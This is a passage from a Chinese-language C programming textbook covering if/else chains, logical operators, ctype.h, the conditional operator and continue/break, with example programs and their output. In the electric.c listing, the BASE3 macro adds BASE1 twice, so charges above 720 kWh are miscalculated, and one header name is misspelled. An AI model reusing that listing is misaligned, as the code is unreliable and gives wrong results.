的逻辑运算符可用来测试字符是否不是空格、不是逗号等,但是列出所有的 可能性太繁琐。C 有一系列专门处理字符的函数,ctype.h头文件包含了这些 函数的原型。这些函数接受一个字符作为参数,如果该字符属于某特殊的类 别,就返回一个非零值(真);否则,返回0(假)。例如,如果isalpha() 函数的参数是一个字母,则返回一个非零值。程序清单7.3在程序清单7.2的 基础上使用了这个函数,还使用了刚才精简后的循环。 程序清单7.3 cypher2.c程序 // cypher2.c -- 替换输入的字母,非字母字符保持不变 #include <stdio.h> #include <ctype.h>       // 包含isalpha()的函数原型 int main(void) { char ch; 419 while ((ch = getchar()) != '\n') { if (isalpha(ch))    // 如果是一个字符, putchar(ch + 1);  // 显示该字符的下一个字符 else          // 否则, putchar(ch);    // 原样显示 } putchar(ch);        // 显示换行符 return 0; } 下面是该程序的一个输出示例,注意大小写字母都被替换了,除了空格 和标点符号: Look! It's a programmer! Mppl! Ju't b qsphsbnnfs! 表7.1和表7.2列出了ctype.h头文件中的一些函数。有些函数涉及本地 化,指的是为适应特定区域的使用习惯修改或扩展 C 基本用法的工具(例 如,许多国家在书写小数点时,用逗号代替点号,于是特殊的本地化可以指 定C编译器使用逗号以相同的方式输出浮点数,这样123.45可以显示为 123,45)。注意,字符映射函数不会修改原始的参数,这些函数只会返回已 修改的值。也就是说,下面的语句不改变ch的值: tolower(ch); // 不影响ch的值 420 这样做才会改变ch的值: ch = tolower(ch); // 把ch转换成小写字母 表7.1 ctype.h头文件中的字符测试函数 表7.2 ctype.h头文件中的字符映射函数 7.2.3 多重选择else if 现实生活中我们经常有多种选择。在程序中也可以用else if扩展if else结 构模拟这种情况。来看一个特殊的例子。电力公司通常根据客户的总用电量 来决定电费。下面是某电力公司的电费清单,单位是千瓦时(kWh): 首 360kWh:     $0.13230/kWh 续 108kWh:     $0.15040/kWh 续 252kWh:     $0.30025/kWh 421 超过 720kWh:    $0.34025/kWh 如果对用电管理感兴趣,可以编写一个计算电费的程序。程序清单7.4 是完成这一任务的第1步。 程序清单7.4 electric.c程序 // electric.c -- 计算电费 #include <stdio.h> #define RATE1  0.13230       // 首次使用 360 kwh 的费率 #define RATE2  0.15040       // 接着再使用 108 kwh 的费率 #define RATE3  0.30025       // 接着再使用 252 kwh 的费率 #define RATE4  0.34025       // 使用超过 720kwh 的费率 #define BREAK1 360.0        // 费率的第1个分界点 #define BREAK2 468.0        // 费率的第2个分界点 #define BREAK3 720.0        // 费率的第3个分界点 #define BASE1 (RATE1 * BREAK1) // 使用360kwh的费用 #define BASE2 (BASE1 + (RATE2 * (BREAK2 - BREAK1))) // 使用468kwh的费用 #define BASE3 (BASE1 + BASE2 + (RATE3 *(BREAK3 - BREAK2))) // 使用720kwh的费用 422 int main(void) { double kwh;           // 使用的千瓦时 double bill;          // 电费 printf("Please enter the kwh used.\n"); scanf("%lf", &kwh);       // %lf对应double类型 if (kwh <= BREAK1) bill = RATE1 * kwh; else if (kwh <= BREAK2)     // 360~468 kwh bill = BASE1 + (RATE2 * (kwh - BREAK1)); else if (kwh <= BREAK3)     // 468~720 kwh bill = BASE2 + (RATE3 * (kwh - BREAK2)); else              // 超过 720 kwh bill = BASE3 + (RATE4 * (kwh - BREAK3)); printf("The charge for %.1f kwh is $%1.2f.\n", kwh, bill); return 0; } 该程序的输出示例如下: Please enter the kwh used. 423 580 The charge for 580.0 kwh is $97.50. 
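可以用程序开头定义的常量手工核对这个结果:BASE1 = 0.13230 * 360 = 47.628,BASE2 = 47.628 + 0.15040 * (468 - 360) = 63.8712。580千瓦时落在468~720千瓦时这一档,因此电费是 BASE2 + 0.30025 * (580 - 468) = 63.8712 + 33.628 = 97.4992,按 %1.2f 的格式打印出来就是 $97.50,与程序的输出一致。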
程序清单 7.4 用符号常量表示不同的费率和费率分界点,以便把常量统一放在一处。这样,电力公司在更改费率以及费率分界点时,更新数据非常方便。BASE1和BASE2根据费率和费率分界点来表示。一旦费率或分界点发生了变化,它们也会自动更新。预处理器是不进行计算的。程序中出现BASE1的地方都会被替换成 0.13230*360.0。不用担心,编译器会对该表达式求值得到一个数值(47.628),以便最终的程序代码使用的是47.628而不是一个计算式。

程序流简单明了。该程序根据kwh的值在4个公式之间选择一个。特别要注意的是,只有当kwh大于360时,程序才会到达第1个else。因此,else if (kwh <= BREAK2)这行相当于要求kwh在360~468之间,如程序注释所示。类似地,只有当kwh的值超过720时,才会执行最后的else。最后,注意BASE1、BASE2和BASE3分别代表360、468和720千瓦时的总费用。因此,当电量超过这些值时,只需要加上额外的费用即可。

实际上,else if 是已学过的 if else 语句的变式。例如,该程序的核心部分只不过是下面代码的另一种写法:

if (kwh <= BREAK1)
    bill = RATE1 * kwh;
else
    if (kwh <= BREAK2)            // 360~468 kwh
        bill = BASE1 + (RATE2 * (kwh - BREAK1));
    else
        if (kwh <= BREAK3)        // 468~720 kwh
            bill = BASE2 + (RATE3 * (kwh - BREAK2));
        else                      // 超过720 kwh
            bill = BASE3 + (RATE4 * (kwh - BREAK3));

也就是说,该程序由一个if else语句组成,else部分包含另一个if else语句,该if else语句的else部分又包含另一个if else语句。第2个if else语句嵌套在第1个if else语句中,第3个if else语句嵌套在第2个if else语句中。回忆一下,整个if else语句被视为一条语句,因此不必把嵌套的if else语句用花括号括起来。当然,花括号可以更清楚地表明这种特殊格式的含义。

这两种形式完全等价。唯一不同的是使用空格和换行的位置不同,不过编译器会忽略这些。尽管如此,第1种形式还是好些,因为这种形式更清楚地显示了有4种选择。在浏览程序时,这种形式让读者更容易看清楚各项选择。在需要时要缩进嵌套的部分,例如,必须测试两个单独的量时。本例中,仅在夏季对用电量超过720kWh的用户加收10%的电费,就属于这种情况。

可以把多个else if语句连成一串使用,如下所示(当然,要在编译器的限制范围内):

if (score < 1000)
    bonus = 0;
else if (score < 1500)
    bonus = 1;
else if (score < 2000)
    bonus = 2;
else if (score < 2500)
    bonus = 4;
else
    bonus = 6;

(这可能是一个游戏程序的一部分,bonus表示下一局游戏获得的光子炸弹或补给。)

对于编译器的限制范围,C99标准要求编译器最少支持127层嵌套。

7.2.4 else与if配对

如果程序中有许多if和else,编译器如何知道哪个if对应哪个else?例如,考虑下面的程序段:

if (number > 6)
    if (number < 12)
        printf("You're close!\n");
else
    printf("Sorry, you lose a turn!\n");

何时打印Sorry, you lose a turn!?当number小于或等于6时,还是number大于12时?换言之,else与第1个if还是第2个if匹配?答案是,else与第2个if匹配。也就是说,输入的数字和匹配的响应如下:

数字    响应
5       None
10      You're close!
15      Sorry, you lose a turn!

规则是,如果没有花括号,else与离它最近的if匹配,除非最近的if被花括号括起来(见图7.2)。

图7.2 if else匹配的规则

注意:要缩进“语句”,“语句”可以是一条简单语句或复合语句。

第1个例子的缩进使得else看上去与第1个if相匹配,但是记住,编译器是忽略缩进的。如果希望else与第1个if匹配,应该这样写:

if (number > 6)
{
    if (number < 12)
        printf("You're close!\n");
}
else
    printf("Sorry, you lose a turn!\n");

这样改动后,响应如下:

数字    响应
5       Sorry, you lose a turn!
10      You're close!
15      None

7.2.5 多层嵌套的if语句

前面介绍的if...else if...else序列是嵌套if的一种形式,从一系列选项中选择一个执行。有时,选择一个特定选项后又引出其他选择,这种情况可以使用另一种嵌套if。例如,程序可以使用if else选择男女,if else的每个分支里又包含另一个if else来区分不同收入的群体。

我们把这种形式的嵌套if应用在下面的程序中。给定一个整数,显示所有能整除它的约数。如果没有约数,则报告该数是一个素数。

在编写程序的代码之前要先规划好。首先,要总体设计一下程序。为方便起见,程序应该使用一个循环让用户能连续输入待测试的数。这样,测试一个新的数字时不必每次都要重新运行程序。下面是我们为这种循环开发的一个模型(伪代码):

提示用户输入数字
当scanf()返回值为1
    分析该数并报告结果
    提示用户继续输入

回忆一下,在测试条件中使用scanf(),可以把读取数字和判断是否结束循环合并在一起。

下一步,设计如何找出约数。也许最直接的方法是:

for (div = 2; div < num; div++)
    if (num % div == 0)
        printf("%d is divisible by %d\n", num, div);

该循环检查2~num之间的所有数字,测试它们是否能被num整除。但是,这个方法有点浪费时间。我们可以改进一下。例如,考虑如果144%2得0,说明2是144的约数;如果144除以2得72,那么72也是144的一个约数。所以,num % div测试成功可以获得两个约数。为了弄清其中的原理,我们分析一下循环中得到的成对约数:2和72、3和48、4和36、6和24、8和18、9和16、12和12、16和9、18和8,等等。在得到12和12这对约数后,又开始得到已找到的相同约数(次序相反)。因此,不用循环到143,在达到12以后就可以停止循环。这大大地节省了循环时间!
分析后发现,必须测试的数只要到num的平方根就可以了,不用到 num。对于9这样的数字,不会节约很多时间,但是对于10000这样的数,使 429 用哪一种方法求约数差别很大。不过,我们不用在程序中计算平方根,可以 这样编写测试条件: for (div = 2; (div * div) <= num; div++) if (num % div == 0) printf("%d is divisible by %d and %d.\n",num, div, num / div); 如果num是144,当div = 12时停止循环。如果num是145,当div = 13时停 止循环。 不使用平方根而用这样的测试条件,有两个原因。其一,整数乘法比求 平方根快。其二,我们还没有正式介绍平方根函数。 还要解决两个问题才能准备编程。第1个问题,如果待测试的数是一个 完全平方数怎么办?报告144可以被12和12整除显得有点傻。可以使用嵌套 if语句测试div是否等于num /div。如果是,程序只打印一个约数: for (div = 2; (div * div) <= num; div++) { if (num % div == 0) { if (div * div != num) printf("%d is divisible by %d and %d.\n",num, div, num / div); else printf("%d is divisible by %d.\n", num, div); } 430 } 注意 从技术角度看,if else语句作为一条单独的语句,不必使用花括号。外 层if也是一条单独的语句,也不必使用花括号。但是,当语句太长时,使用 花括号能提高代码的可读性,而且还可防止今后在if循环中添加其他语句时 忘记加花括号。 第2个问题,如何知道一个数字是素数?如果num是素数,程序流不会 进入if语句。要解决这个问题,可以在外层循环把一个变量设置为某个值 (如,1),然后在if语句中把该变量重新设置为0。循环完成后,检查该变 量是否是1,如果是,说明没有进入if语句,那么该数就是素数。这样的变 量通常称为标记(flag)。 一直以来,C都习惯用int作为标记的类型,其实新增的_Bool类型更合 适。另外,如果在程序中包含了stdbool.h头文件,便可用bool代替_Bool类 型,用true和false分别代替1和0。 程序清单7.5体现了以上分析的思路。为扩大该程序的应用范围,程序 用long类型而不是int类型(如果系统不支持_Bool类型,可以把isPrime的类 型改为int,并用1和0分别替换程序中的true和false)。 程序清单7.5 divisors.c程序 // divisors.c -- 使用嵌套if语句显示一个数的约数 #include <stdio.h> #include <stdbool.h> int main(void) { 431 unsigned long num;     // 待测试的数 unsigned long div;     // 可能的约数 bool isPrime;       // 素数标记 printf("Please enter an integer for analysis; "); printf("Enter q to quit.\n"); while (scanf("%lu", &num) == 1) { for (div = 2, isPrime = true; (div * div) <= num; div++) { if (num % div == 0) { if ((div * div) != num) printf("%lu is divisible by %lu and %lu.\n", num, div, num / div); else printf("%lu is divisible by %lu.\n", num, div); isPrime = false;  // 该数不是素数 } 432 } if (isPrime) printf("%lu is prime.\n", num); printf("Please enter another integer for analysis; "); printf("Enter q to quit.\n"); } printf("Bye.\n"); return 0; } 注意,该程序在for循环的测试表达式中使用了逗号运算符,这样每次 输入新值时都可以把isPrime设置为true。 下面是该程序的一个输出示例: Please enter an integer for analysis; Enter q to quit. 123456789 123456789 is divisible by 3 and 41152263. 123456789 is divisible by 9 and 13717421. 123456789 is divisible by 3607 and 34227. 123456789 is divisible by 3803 and 32463. 123456789 is divisible by 10821 and 11409. 433 Please enter another integer for analysis; Enter q to quit. 149 149 is prime. Please enter another integer for analysis; Enter q to quit. 2013 2013 is divisible by 3 and 671. 2013 is divisible by 11 and 183. 2013 is divisible by 33 and 61. Please enter another integer for analysis; Enter q to quit. q Bye. 该程序会把1认为是素数,其实它不是。下一节将要介绍的逻辑运算符 可以排除这种特殊的情况。 小结:用if语句进行选择 关键字:if、else 一般注解: 下面各形式中,statement可以是一条简单语句或复合语句。表达式为真 说明其值是非零值。 形式1: if (expression) 434 statement 如果expression为真,则执行statement部分。 形式2: if (expression) statement1 else statement2 如果expression为真,执行statement1部分;否则,执行statement2部分。 形式3: if (expression1) statement1 else if (expression2) statement2 else statement3 如果expression1为真,执行statement1部分;如果expression2为真,执行 statement2部分;否则,执行statement3部分。 示例: if (legs == 4) 435 printf("It might be a horse.\n"); else if (legs > 4) printf("It is not a horse.\n"); else   /* 如果legs < 4 */ { legs++; printf("Now it has one more leg.\n"); } 436 7.3 逻辑运算符 读者已经很熟悉了,if 语句和 while 语句通常使用关系表达式作为测试 条件。有时,把多个关系表达式组合起来会很有用。例如,要编写一个程 序,计算输入的一行句子中除单引号和双引号以外其他字符的数量。这种情 况下可以使用逻辑运算符,并使用句点(.)标识句子的末尾。程序清单7.6 用一个简短的程序进行演示。 程序清单7.6 chcount.c程序 // chcount.c -- 使用逻辑与运算符 #include <stdio.h> #define PERIOD '.' 
int main(void) { char ch; int charcount = 0; while ((ch = getchar()) != PERIOD) { if (ch != '"' && ch != '\'') charcount++; } printf("There are %d non-quote characters.\n", charcount); 437 return 0; } 下面是该程序的一个输出示例: I didn't read the "I'm a Programming Fool" best seller. There are 50 non-quote characters. 程序首先读入一个字符,并检查它是否是一个句点,因为句点标志一个 句子的结束。接下来,if语句的测试条件中使用了逻辑与运算符&&。该 if 语句翻译成文字是“如果待测试的字符不是双引号,并且它也不是单引号, 那么charcount递增1”。 逻辑运算符两侧的条件必须都为真,整个表达式才为真。逻辑运算符的 优先级比关系运算符低,所以不必在子表达式两侧加圆括号。 C有3种逻辑运算符,见表7.3。 表7.3 种逻辑运算符 假设exp1和exp2是两个简单的关系表达式(如car > rat或debt == 1000),那么: 当且仅当exp1和exp2都为真时,exp1 && exp2才为真; 如果exp1或exp2为真,则exp1 || exp2为真; 如果exp1为假,则!exp1为真;如果exp1为真,则!exp1为假。 下面是一些具体的例子: 438 5 > 2 && 4 > 7为假,因为只有一个子表达式为真; 5 > 2 || 4 > 7为真,因为有一个子表达式为真; !(4 > 7)为真,因为4不大于7。 顺带一提,最后一个表达式与下面的表达式等价: 4 <= 7 如果不熟悉逻辑运算符或者觉得很别扭,请记住:(练习&&时间)== 完 美。 7.3.1 备选拼写:iso646.h头文件 C 是在美国用标准美式键盘开发的语言。但是在世界各地,并非所有的 键盘都有和美式键盘一样的符号。因此,C99标准新增了可代替逻辑运算符 的拼写,它们被定义在ios646.h头文件中。如果在程序中包含该头文件,便 可用and代替&&、or代替||、not代替!。例如,可以把下面的代码: if (ch != '"' && ch != '\'') charcount++; 改写为: if (ch != '"' and ch != '\'') charcount++; 表7.4列出了逻辑运算符对应的拼写,很容易记。读者也许很好奇,为 何C不直接使用and、or和not?因为C一直坚持尽量保持较少的关键字。参考 资料V“新增C99和C11的标准ANSI C库”列出了一些运算符的备选拼写,有些 我们还没见过。 表7.4 逻辑运算符的备选拼写 439 7.3.2 优先级 !运算符的优先级很高,比乘法运算符还高,与递增运算符的优先级相 同,只比圆括号的优先级低。&&运算符的优先级比||运算符高,但是两者的 优先级都比关系运算符低,比赋值运算符高。因此,表达式a >b && b > c || b > d相当于((a > b) && (b > c)) || (b > d)。 也就是说,b介于a和c之间,或者b大于d。 尽管对于该例没必要使用圆括号,但是许多程序员更喜欢使用带圆括号 的第 2 种写法。这样做即使不记得逻辑运算符的优先级,表达式的含义也很 清楚。 7.3.3 求值顺序 除了两个运算符共享一个运算对象的情况外,C 通常不保证先对复杂表 达式中哪部分求值。例如,下面的语句,可能先对表达式5 + 3求值,也可 能先对表达式9 + 6求值: apples = (5 + 3) * (9 + 6); C 把先计算哪部分的决定权留给编译器的设计者,以便针对特定系统优 化设计。但是,对于逻辑运算符是个例外,C保证逻辑表达式的求值顺序是 从左往右。&&和||运算符都是序列点,所以程序在从一个运算对象执行到下 一个运算对象之前,所有的副作用都会生效。而且,C 保证一旦发现某个元 素让整个表达式无效,便立即停止求值。正是由于有这些规定,才能写出这 样结构的代码: while ((c = getchar()) != ' ' && c != '\n') 440 如上代码所示,读取字符直至遇到第1 个空格或换行符。第1 个子表达 式把读取的值赋给c,后面的子表达式会用到c的值。如果没有求值循序的保 证,编译器可能在给c赋值之前先对后面的表达式求值。 这里还有一个例子: if (number != 0 && 12/number == 2) printf("The number is 5 or 6.\n"); 如果number的值是0,那么第1个子表达式为假,且不再对关系表达式求 值。这样避免了把0作为除数。许多语言都没有这种特性,知道number为0 后,仍继续检查后面的条件。 最后,考虑这个例子: while ( x++ < 10 && x + y < 20) 实际上,&&是一个序列点,这保证了在对&&右侧的表达式求值之前, 已经递增了x。 小结:逻辑运算符和表达式 逻辑运算符: 逻辑运算符的运算对象通常是关系表达式。!运算符只需要一个运算对 象,其他两个逻辑运算符都需要两个运算对象,左侧一个,右侧一个。 逻辑表达式: 441 当且仅当expression1和expression2都为真,expression1 && expression2才 为真。如果 expression1 或 expression2 为真,expression1 || expression2 为 真。如果expression为假,!expression则为真,反之亦然。 求值顺序: 逻辑表达式的求值顺序是从左往右。一旦发现有使整个表达式为假的因 素,立即停止求值。 示例: 6 > 2 && 3 == 3     真 !(6 > 2 && 3 == 3)   假 x != 0 && (20 / x) < 5 只有当x不等于0时,才会对第2个表达式求值 7.3.4 范围 &&运算符可用于测试范围。例如,要测试score是否在90~100的范围 内,可以这样写: if (range >= 90 && range <= 100) printf("Good show!\n"); 千万不要模仿数学上的写法: if (90 <= range <= 100)  // 千万不要这样写! 
printf("Good show!\n"); 这样写的问题是代码有语义错误,而不是语法错误,所以编译器不会捕 获这样的问题(虽然可能会给出警告)。由于<=运算符的求值顺序是从左 往右,所以编译器把测试表达式解释为: 442 (90 <= range) <= 100 子表达式90 <= range的值要么是1(为真),要么是0(为假)。这两个 值都小于100,所以不管range的值是多少,整个表达式都恒为真。因此,在 范围测试中要使用&&。 许多代码都用范围测试来确定一个字符是否是小写字母。例如,假设ch 是char类型的变量: if (ch >= 'a' && ch <= 'z') printf("That's a lowercase character.\n"); 该方法仅对于像ASCII这样的字符编码有效,这些编码中相邻字母与相 邻数字一一对应。但是,对于像EBCDIC这样的代码就没用了。相应的可移 植方法是,用ctype.h系列中的islower()函数(参见表7.1): if (islower(ch)) printf("That's a lowercase character.\n"); 无论使用哪种特定的字符编码,islower()函数都能正常运行(不过,一 些早期的编译器没有ctype.h系列)。 443 7.4 一个统计单词的程序 现在,我们可以编写一个统计单词数量的程序(即,该程序读取并报告 单词的数量)。该程序还可以计算字符数和行数。先来看看编写这样的程序 要涉及那些内容。 首先,该程序要逐个字符读取输入,知道何时停止读取。然后,该程序 能识别并计算这些内容:字符、行数和单词。据此我们编写的伪代码如下: 读取一个字符 当有更多输入时 递增字符计数 如果读完一行,递增行数计数 如果读完一个单词,递增单词计数 读取下一个字符 前面有一个输入循环的模型: while ((ch = getchar()) != STOP) { ... } 这里,STOP表示能标识输入末尾的某个值。以前我们用过换行符和句 点标记输入的末尾,但是对于一个通用的统计单词程序,它们都不合适。我 们暂时选用一个文本中不常用的字符(如,|)作为输入的末尾标记。第8章 中会介绍更好的方法,以便程序既能处理文本文件,又能处理键盘输入。 444 现在,我们考虑循环体。因为该程序使用getchar()进行输入,所以每次 迭代都要通过递增计数器来计数。为了统计行数,程序要能检查换行字符。 如果输入的字符是一个换行符,该程序应该递增行数计数器。这里要注意 STOP 字符位于一行的中间的情况。是否递增行数计数?我们可以作为特殊 行计数,即没有换行符的一行字符。可以通过记录之前读取的字符识别这种 情况,即如果读取时发现 STOP 字符的上一个字符不是换行符,那么这行就 是特殊行。 最棘手的部分是识别单词。首先,必须定义什么是该程序识别的单词。 我们用一个相对简单的方法,把一个单词定义为一个不含空白(即,没有空 格、制表符或换行符)的字符序列。因此,“glymxck”和“r2d2”都算是一个单 词。程序读取的第 1 个非空白字符即是一个单词的开始,当读到空白字符时 结束。判断非空白字符最直接的测试表达式是: c != ' ' && c != '\n' && c != '\t' /* 如果c不是空白字符,该表达式为真*/ 检测空白字符最直接的测试表达式是: c == ' ' || c == '\n' || c == '\t' /*如果c是空白字符,该表达式为真*/ 然而,使用ctype.h头文件中的函数isspace()更简单,如果该函数的参数 是空白字符,则返回真。所以,如果c是空白字符,isspace(c)为真;如果c不 是空白字符,!isspace(c)为真。 要查找一个单词里是否有某个字符,可以在程序读入单词的首字符时把 一个标记(名为 inword)设置为1。也可以在此时递增单词计数。然后,只 要inword为1(或true),后续的非空白字符都不记为单词的开始。下一个空 白字符,必须重置标记为0(或false),然后程序就准备好读取下一个单 词。我们把以上分析写成伪代码: 如果c不是空白字符,且inword为假 设置inword为真,并给单词计数 445 如果c是空白字符,且inword为真 设置inword为假 这种方法在读到每个单词的开头时把inword设置为1(真),在读到每 个单词的末尾时把inword设置为0(假)。只有在标记从0设置为1时,递增 单词计数。如果能使用_Bool类型,可以在程序中包含stdbool.h头文件,把 inword的类型设置为bool,其值用true和false表示。如果编译器不支持这种 用法,就把inword的类型设置为int,其值用1和0表示。 如果使用布尔类型的变量,通常习惯把变量自身作为测试条件。如下所 示: 用if (inword)代替if (inword == true) 用if (!inword)代替if (inword == false) 可以这样做的原因是,如果 inword为true,则表达式 inword == true为 true;如果 inword为false,则表达式inword == true为false。所以,还不如直 接用inword作为测试条件。类似地,!inword的值与表达式inword == false的 值相同(非真即false,非假即true)。 程序清单7.7把上述思路(识别行、识别不完整的行和识别单词)翻译 了成C代码。 程序清单7.7 wordcnt.c程序 // wordcnt.c -- 统计字符数、单词数、行数 #include <stdio.h> #include <ctype.h>     // 为isspace()函数提供原型 #include <stdbool.h>    // 为bool、true、false提供定义 446 #define STOP '|' int main(void) { char c;        // 读入字符 char prev;       // 读入的前一个字符 long n_chars = 0L;// 字符数 int n_lines = 0;    // 行数 int n_words = 0;    // 单词数 int p_lines = 0;    // 不完整的行数 bool inword = false;  // 如果c在单词中,inword 等于 true printf("Enter text to be analyzed (| to terminate):\n"); prev = '\n';      // 用于识别完整的行 while ((c = getchar()) != STOP) { n_chars++;     // 统计字符 if (c == '\n') n_lines++;   // 统计行 if (!isspace(c) && !inword) { 447 inword = true;// 开始一个新的单词 n_words++;   // 统计单词 } if (isspace(c) && inword) inword = false;  // 打到单词的末尾 prev = c;     // 保存字符的值 } if (prev != '\n') p_lines = 1; printf("characters = %ld, words = %d, lines = %d, ", n_chars, n_words, n_lines); printf("partial lines = %d\n", p_lines); return 0; } 下面是运行该程序后的一个输出示例: Enter text to be analyzed (| to terminate): Reason is a powerful servant but an inadequate master. 
448 | characters = 55, words = 9, lines = 3, partial lines = 0 该程序使用逻辑运算符把伪代码翻译成C代码。例如,把下面的伪代 码: 如果c不是空白字符,且inword为假 翻译成如下C代码: if (!isspace(c) &&!inword) 再次提醒读者注意,!inword 与 inword == false 等价。上面的整个测试 条件比单独判断每个空白字符的可读性高: if (c != ' ' && c != '\n' && c != '\t' && !inword) 上面的两种形式都表示“如果c不是空白字符,且如果c不在单词里”。如 果两个条件都满足,则一定是一个新单词的开头,所以要递增n_words。如 果位于单词中,满足第1个条件,但是inword为true,就不递增 n_word。当 读到下一个空白字符时,inword 被再次设置为 false。检查代码,查看一下 如果单词之间有多个空格时,程序是否能正常运行。第 8 章讲解了如何修正 这个问题,让该程序能统计文件中的单词量。 449 7.5 条件运算符:?: C提供条件表达式(conditional expression)作为表达if else语句的一种 便捷方式,该表达式使用?:条件运算符。该运算符分为两部分,需要 3 个运 算对象。回忆一下,带一个运算对象的运算符称为一元运算符,带两个运算 对象的运算符称为二元运算符。以此类推,带 3 个运算对象的运算符称为三 元运算符。条件运算符是C语言中唯一的三元运算符。下面的代码得到一个 数的绝对值: x = (y < 0) ? -y : y; 在=和;之间的内容就是条件表达式,该语句的意思是“如果y小于0,那 么x = -y;否则,x = y”。用if else可以这样表达: if (y < 0) x = -y; else x = y; 条件表达式的通用形式如下: expression1 ? expression2 : expression3 如果 expression1 为真(非 0),那么整个条件表达式的值与 expression2 的值相同;如果expression1为假(0),那么整个条件表达式的值与 expression3的值相同。 需要把两个值中的一个赋给变量时,就可以用条件表达式。典型的例子 是,把两个值中的最大值赋给变量: max = (a > b) ? a : b; 450 如果a大于b,那么将max设置为a;否则,设置为b。 通常,条件运算符完成的任务用 if else 语句也可以完成。但是,使用条 件运算符的代码更简洁,而且编译器可以生成更紧凑的程序代码。 我们来看程序清单7.8中的油漆程序,该程序计算刷给定平方英尺的面 积需要多少罐油漆。基本算法很简单:用平方英尺数除以每罐油漆能刷的面 积。但是,商店只卖整罐油漆,不会拆分来卖,所以如果计算结果是1.7 罐,就需要两罐。因此,该程序计算得到带小数的结果时应该进1。条件运 算符常用于处理这种情况,而且还要根据单复数分别打印can和cans。 程序清单7.8 paint.c程序 /* paint.c -- 使用条件运算符 */ #include <stdio.h> #define COVERAGE 350   // 每罐油漆可刷的面积(单位:平方英 尺) int main(void) { int sq_feet; int cans; printf("Enter number of square feet to be painted:\n"); while (scanf("%d", &sq_feet) == 1) { cans = sq_feet / COVERAGE; 451 cans += ((sq_feet % COVERAGE == 0)) ? 0 : 1; printf("You need %d %s of paint.\n", cans, cans == 1 ? "can" : "cans"); printf("Enter next value (q to quit):\n"); } return 0; } 下面是该程序的运行示例: Enter number of square feet to be painted: 349 You need 1 can of paint. Enter next value (q to quit): 351 You need 2 cans of paint. Enter next value (q to quit): q 该程序使用的变量都是int类型,除法的计算结果(sq_feet / COVERAGE)会被截断。也就是说, 351/350得1。所以,cans被截断成整 数部分。如果sq_feet % COVERAGE得0,说明sq_feet被COVERAGE整除, cans的值不变;否则,肯定有余数,就要给cans加1。这由下面的语句完成: 452 cans += ((sq_feet % COVERAGE == 0)) ? 0 : 1; 该语句把+=右侧表达式的值加上cans,再赋给cans。右侧表达式是一个 条件表达式,根据sq_feet是否能被COVERAGE整除,其值为0或1。 printf()函数中的参数也是一个条件表达式: cans == 1 ? "can" : "cans"); 如果cans的值是1,则打印can;否则,打印cans。这也说明了条件运算 符的第2个和第3个运算对象可以是字符串。 小结:条件运算符 条件运算符:?: 一般注解: 条件运算符需要3个运算对象,每个运算对象都是一个表达式。其通用 形式如下: expression1 ? expression2 : expression3 如果expression1为真,整个条件表达式的值是expression2的值;否则, 是expression3的值。 示例: (5 > 3) ? 1 : 2 值为1 (3 > 5) ? 1 : 2 值为2 (a > b) ? a : b 如果a >b,则取较大的值 453 7.6 循环辅助:continue和break 一般而言,程序进入循环后,在下一次循环测试之前会执行完循环体中 的所有语句。continue 和break语句可以根据循环体中的测试结果来忽略一部 分循环内容,甚至结束循环。 7.6.1 continue语句 3种循环都可以使用continue语句。执行到该语句时,会跳过本次迭代的 剩余部分,并开始下一轮迭代。如果continue语句在嵌套循环内,则只会影 响包含该语句的内层循环。程序清单7.9中的简短程序演示了如何使用 continue。 程序清单7.9 skippart.c程序 /* skippart.c -- 使用continue跳过部分循环 */ #include <stdio.h> int main(void) { const float MIN = 0.0f; const float MAX = 100.0f; float score; float total = 0.0f; int n = 0; float min = MAX; 454 float max = MIN; printf("Enter the first score (q to quit): "); while (scanf("%f", &score) == 1) { if (score < MIN || score > MAX) { printf("%0.1f is an invalid value.Try again: ",score); continue;  // 跳转至while循环的测试条件 } printf("Accepting %0.1f:\n", score); min = (score < min) ? score : min; max = (score > max) ? 
score : max; total += score; n++; printf("Enter next score (q to quit): "); } if (n > 0) { printf("Average of %d scores is %0.1f.\n", n, total / n); 455 printf("Low = %0.1f, high = %0.1f\n", min, max); } else printf("No valid scores were entered.\n"); return 0; } 在程序清单7.9中,while循环读取输入,直至用户输入非数值数据。循 环中的if语句筛选出无效的分数。假设输入 188,程序会报告:188 is an invalid value。在本例中,continue 语句让程序跳过处理有效输入部分的代 码。程序开始下一轮循环,准备读取下一个输入值。 注意,有两种方法可以避免使用continue,一是省略continue,把剩余部 分放在一个else块中: if (score < 0 || score > 100) /* printf()语句 */ else { /* 语句*/ } 另一种方法是,用以下格式来代替: if (score >= 0 && score <= 100) 456 { /* 语句 */ } 这种情况下,使用continue的好处是减少主语句组中的一级缩进。当语 句很长或嵌套较多时,紧凑简洁的格式提高了代码的可读性。 continue还可用作占位符。例如,下面的循环读取并丢弃输入的数据, 直至读到行末尾: while (getchar() != '\n') ; 当程序已经读取一行中的某些内容,要跳至下一行开始处时,这种用法 很方便。问题是,一般很难注意到一个单独的分号。如果使用continue,可 读性会更高: while (getchar() != '\n') continue; 如果用了continue没有简化代码反而让代码更复杂,就不要使用 continue。例如,考虑下面的程序段: while ((ch = getchar() ) != '\n') { if (ch == '\t') continue; putchar(ch); 457 } 该循环跳过制表符,并在读到换行符时退出循环。以上代码这样表示更 简洁: while ((ch = getchar()) != '\n') if (ch != '\t') putchar(ch); 通常,在这种情况下,把if的测试条件的关系反过来便可避免使用 continue。 以上介绍了continue语句让程序跳过循环体的余下部分。那么,从何处 开始继续循环?对于while和 do while 循环,执行 continue 语句后的下一个 行为是对循环的测试表达式求值。考虑下面的循环: count = 0; while (count < 10) { ch = getchar(); if (ch == '\n') continue; putchar(ch); count++; } 458 该循环读取10个字符(除换行符外,因为当ch是换行符时,程序会跳过 count++;语句)并重新显示它们,其中不包括换行符。执行continue后,下一 个被求值的表达式是循环测试条件。 对于for循环,执行continue后的下一个行为是对更新表达式求值,然后 是对循环测试表达式求值。例如,考虑下面的循环: for (count = 0; count < 10; count++) { ch = getchar(); if (ch == '\n') continue; putchar(ch); } 该例中,执行完continue后,首先递增count,然后将递增后的值和10作 比较。因此,该循环与上面while循环的例子稍有不同。while循环的例子 中,除了换行符,其余字符都显示;而本例中,换行符也计算在内,所以读 取的10个字符中包含换行符。 7.6.2 break语句 程序执行到循环中的break语句时,会终止包含它的循环,并继续执行 下一阶段。把程序清单7.9中的continue替换成break,在输入188时,不是跳 至执行下一轮循环,而是导致退出当前循环。图7.3比较了break和continue。 如果break语句位于嵌套循环内,它只会影响包含它的当前循环。 459 图7.3 比较break和continue 460 break还可用于因其他原因退出循环的情况。程序清单7.10用一个循环计 算矩形的面积。如果用户输入非数字作为矩形的长或宽,则终止循环。 程序清单7.10 